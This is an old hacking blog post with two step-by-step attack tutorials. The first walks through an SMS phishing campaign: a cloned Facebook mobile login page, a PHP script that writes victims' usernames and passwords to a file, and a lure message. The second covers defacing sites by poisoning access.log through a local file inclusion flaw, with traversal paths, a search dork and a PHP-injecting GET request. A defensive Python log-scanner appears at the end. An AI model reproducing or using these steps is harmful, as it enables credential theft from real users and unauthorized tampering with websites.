Monday, June 14, 2010

SMS phishing

NOTE: THIS TUTORIAL IS WRITTEN FOR EDUCATIONAL PURPOSES ONLY AND I TAKE NO RESPONSIBILITY FOR WHAT YOU DO WITH THIS.

Here we are making a fake mobile login page for Facebook.

What happens?
The victim receives an SMS on his mobile, apparently from Facebook, asking him to try out the new version of Facebook. A link is provided in the SMS. The victim opens the link and sees the Facebook login page. He logs in and it tells him the username/password is wrong. He gets phished...

To proceed, you need a web server running on your computer that is connected to the internet, and the victim's mobile number.

Process:
SETTING UP YOUR PHISHING PAGE.
Go to http://m.facebook.com and copy the page source. Save it in your web server's public html folder with ".htm" as the extension. Open this html file in Notepad and find the form tag. In it, change the form method from POST to GET and change the form action value to write.php (you can use a different name if you want). Rename the file to "index.htm". Create another file named "write.php", open it, paste the following content into it, and save it.
[code]
<*?php
header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");
$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?*>
[/code]
Also create another file, pswd.txt, and leave it empty. This is the file where the captured usernames and passwords are stored.
You can store these files in any directory under public html. Remember to give the directory a name like facebook or similar.
Now start the server.




CHECKING IF OUR PHISHING PAGE IS WORKING.
Go to cmyip.com to find your IP address. Paste this IP address into the address bar. You should see your phishing page, or your default index.htm (if the files are stored in a subdirectory under public html). If not, the following may be the reasons:
1. You may be behind a router. So, you need to open the router's settings and enable port forwarding to your machine.
2. Your server may be configured not to allow any outside connections. So, check the access settings and enable outside connections.
3. Your server may not be running properly.
Now, navigate to the directory in which the phishing files are stored. For example, my files are in /smsphish under public html, so I'll navigate to...
http://myipaddress/smsphish/
There you can see the fake Facebook login. Enter anything in the username and password fields and press Enter. It should redirect you to the actual Facebook mobile site. Now open pswd.txt and see if the details you entered are logged there. If they are, our work is mostly done. If they are not, check that you have made the necessary changes in index.htm and that write.php has not been tampered with.
Now nearly 90% of the work is done. We move to the last step...


SENDING THE SMS.
Now you have to find free SMS sites that do not require registration. These sites use their own number for sending messages. You can find many such sites. One word: Google. Now come the social engineering techniques. Just type a message like "Experience the brand new, more secure version of facebook, simply follow the link... blah blah" and give the link to our phishing page. A sample message would look like this.
[code]
Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://youripaddress/yourdirectory/
-Facebook development team.
[/code]
You can think of many more luring techniques... just think!
Enter the victim's mobile number and send the message (using a proxy is recommended). If he opens the message and the link, he will see the normal Facebook mobile login, and if he enters the correct details, our phishing worked! Just keep watching pswd.txt for their details!
Note: Be careful when running the server!

Defacing when access.log is accessible

Note: This tutorial is written for educational purposes only and I take no responsibility for any consequences you suffer for executing this.

I have tested it on WampServer (Apache version 2.2.11; I don't know about others). So, here I am going to show how we can change/deface any page on the server if the access log is accessible.

How to access the access.log?
For that, you need to find an LFI vulnerability on the target site, and through that LFI you can include the access log. Here are some probable locations of access.log.
../apache/logs/access.log
../../apache/logs/access.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
Or simply use the dork (inurl:access.log), and you'll be surprised to see so many logs at hand!

Ok, so moving on...

If you find a website with access.log accessible, do the following steps.

Make the following GET request to the website by means of telnet or anything else you wish.

GET /<*?php $vips='---DEFACED---'; $fp = fopen('--LOCATION OF THE WEBPAGE FROM LOG--', 'w'); fputs($fp, $vips); fclose($fp); ?*> HTTP/1.1

(remove the stars *)

But before making this GET request, you need to make some changes to it (double quotes in the GET request may be escaped before logging, so here I am not making use of them):
--DEFACED-- : replace this with the HTML code that will be placed as the defacement.
--LOCATION OF WEBPAGE FROM LOG-- : this is the location of the webpage relative to the log. For example, if the log is in the directory 'logs' and the webpage to deface is in the directory 'pages', and both are in the directory 'web', then this value will be '../pages/index.htm', where index.htm is the name of the page to deface.

After making these changes, make the GET request to the website.

Here, what we have done is inject PHP code into access.log. The PHP code changes the content of index.htm to the HTML content we provided. But this will happen only when access.log is opened. So, now go to the LFI page and include access.log from there, or open the direct link to the log which you may have found from the dork.
The size of access.log may be huge depending on the popularity of the website... but keep it loading. After some time, when our malicious GET request is loaded, the PHP code will be executed, and if successful, we can see the defaced page... Be sure to use a proxy! Your IP address will easily be logged.
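From the server side, the two steps above leave traces in the same access.log: a PHP open tag written into a logged field, and a traversal request pointing at the log file. The following is an added example (not from the original post) of detection logic run over constructed Apache combined-format lines; it also checks the Referer and User-Agent fields, which are logged the same way as the request line and can carry the same payload.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format (not taken from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [14/Jun/2010:10:01:02 +0000] "GET /index.htm HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Jun/2010:10:02:15 +0000] "GET /<?php echo 1; ?> HTTP/1.1" 404 210 "-" "curl/7.19"
203.0.113.9 - - [14/Jun/2010:10:02:40 +0000] "GET /view.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 88312 "-" "curl/7.19"
203.0.113.7 - - [14/Jun/2010:10:03:01 +0000] "GET /about.htm HTTP/1.1" 200 777 "-" "<?php echo 2; ?>"
"""

# ip ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?'
)
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)             # PHP open tag in a logged field
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")                                # ../ or ..\ directory traversal
LOG_NAME_RE = re.compile(r"(?:access|error)[._ ]?log", re.IGNORECASE)  # request points at a server log


def scan_log(text):
    """Return one finding per suspicious event, in file order."""
    findings = []
    for n, raw in enumerate(text.splitlines(), start=1):
        m = LINE_RE.match(raw)
        if not m:
            continue
        # Decode once so %3C%3Fphp and %2e%2e%2f are caught as well as the plain forms.
        fields = {k: unquote(m.group(k) or "") for k in ("req", "ref", "ua")}
        for field, value in fields.items():
            if PHP_TAG_RE.search(value):
                findings.append({"line": n, "ip": m.group("ip"), "field": field, "reason": "php-tag"})
        req = fields["req"]
        if TRAVERSAL_RE.search(req) and LOG_NAME_RE.search(req):
            findings.append({"line": n, "ip": m.group("ip"), "field": "req", "reason": "log-include"})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("line %(line)d  %(ip)-12s %(field)-4s %(reason)s" % f)
```

A php-tag hit followed by a log-include hit from the same address is the sequence this section describes; keeping logs outside the web root and out of reach of include() removes the second step entirely.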